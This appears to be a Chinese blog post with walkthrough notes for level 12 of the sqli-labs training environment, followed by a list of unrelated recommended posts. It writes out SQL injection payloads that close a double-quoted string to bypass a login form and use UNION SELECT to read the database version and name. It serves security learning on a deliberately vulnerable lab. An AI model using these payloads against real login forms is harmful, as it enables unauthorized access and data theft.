sqllab第十二关通关笔记

知识点:

  • 一般字符型注入分类
    • 单引号闭合
    • 双引号闭合
  • 这是一个双引号闭合

看界面又是一个输入框的注入;通过admin admin进行登录发现页面还是有回显

直接使用万能密码尝试

构造payload:username=admin'or1=1

没有任何反应;可能是没加注释符的关闭

构造username=admin'or+1=1#

发现还是没有任何回显信息;第一反应是特殊字符过滤??;或许是单引号的问题

使用双引号试一下

构造payload:username=admin"or+1=1

发现有了报错信息;发现原始语句应该是where username=("输入内容") and passwd=

好好好;知道了原始语句就可以绕过了

构造payload:username=admin"+or+1=1#

页面成功打印出了用户信息

接下来尝试进行联合注入

构造payload:username=a"+union+select+1,2#

成功打印出了输入的信息

接下来获取对应数据库的版本信息和数据库名

构造payload:username=a"+union+select+version(),database()#

成功获取了数据库名和版本信息;

到这里就结束了;具体的敏感信息就不获取了,实际操作和第十一关一样

10

相关推荐
Lv117700837 分钟前
Visual Studio中的字典
ide·笔记·c#·visual studio
LXS_3571 小时前
Day 16 C++提高之模板
开发语言·c++·笔记·学习方法
无名-CODING1 小时前
栈与队列学习笔记
java·笔记
NZT-481 小时前
C++基础笔记(二)队列deque,queue和堆priority_queue
java·c++·笔记
YJlio2 小时前
ZoomIt 学习笔记(11.7):安装与基础使用——演示/授课/录屏的神级放大镜
笔记·学习·intellij-idea
QT 小鲜肉3 小时前
【Linux命令大全】001.文件管理之chattr命令(实操篇)
linux·运维·服务器·笔记
阿蒙Amon4 小时前
JavaScript学习笔记:14.类型数组
javascript·笔记·学习
XFF不秃头4 小时前
力扣刷题笔记-下一个排列
c++·笔记·算法·leetcode
Lv11770084 小时前
Visual Studio中Array数组的常用查询方法
笔记·算法·c#·visual studio
长安er4 小时前
LeetCode 46/51 排列型回溯题笔记-全排列 / N 皇后
笔记·算法·leetcode·回溯·递归·n皇后